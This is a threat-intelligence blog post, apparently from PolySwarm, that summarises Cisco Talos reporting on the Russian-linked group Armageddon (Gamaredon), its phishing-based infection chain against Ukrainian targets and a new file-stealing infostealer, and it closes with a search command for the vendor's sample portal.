Cisco Talos researchers recently reported on new activity perpetrated by Russian nexus threat actor group Armageddon. The group is using a new infostealer to target entities in Ukraine.
- Armageddon is a Russian nexus threat actor group with a history of targeting Ukraine.
- Armageddon uses phishing emails with malicious documents as bait.
- The recent campaign uses a new infostealer not previously observed in the wild.
- The infostealer is capable of stealing files from the victim machine and any connected removable drives.
According to Cisco Talos, Armageddon (Gamaredon) is targeting entities in Ukraine with RAR archives distributing malicious LNK files. The campaign has been active since at least August 2022.
The infection chain begins with phishing emails using lures related to the Russia-Ukraine conflict. The emails deliver malicious Office documents with remote templates containing malicious VBS macros. These macros download and open RAR compressed files containing LNK files.
The LNK files execute MSHTA.EXE to download and parse a remote XML file and execute a PowerShell script. Thie PowerShell script decodes and executes a second PowerShell script, which is an instrumentor used to collect victim data and report it to the C2. It is interesting to note the server only allows access from IP addresses allocated to Ukraine’s address space. The script also gives the C2 the ability to send a PowerShell command or encrypted VBScript to be executed. The instrumentor script has a function to decode the encrypted response from the C2 and execute it as a VBScript object.
The C2 can send multiple payloads, including a PowerShell script to maintain persistence and an infostealer. Cisco Talos notes the infostealer appears to be a new tool not used in previous campaigns.The infostealer exfiltrates files with the following extensions from the victim machine: .doc, .docx, .xls, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z and .mdb. It is capable of stealing files from the victim machine and any connected removable drives.
Who is Armageddon?
Armageddon, also known as Gameredon, Shuckworm, or Primitive Bear, is one of the most active APT groups targeting Ukrainian assets. The group’s past campaigns have involved espionage activity aligned with Russian interests. In November 2021, the Security Service of Ukraine (SSU) publicly linked five Russian Federal Security Service (FSB) officers based in Crimea to the group. A report by the SSU stated Armageddon has been active since at least 2014 and has engaged in multiple cyber-espionage campaigns from 2017-2021. The SSU report notes Armageddon does not typically use sophisticated TTPs and does not seem to emphasize OPSEC. Some TTPs used by Armageddon include spearphishing, PowerShell, UltraVNC, FileStealer, EvilGnome, and Pterodo. We published a blog post on Pterodo earlier this year.
PolySwarm has multiple samples associated with this campaign.
You can use the following CLI command to search for all Armageddon samples in our portal:
$ polyswarm link list -f Gameredon
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at firstname.lastname@example.org | Check out our blog | Subscribe to our reports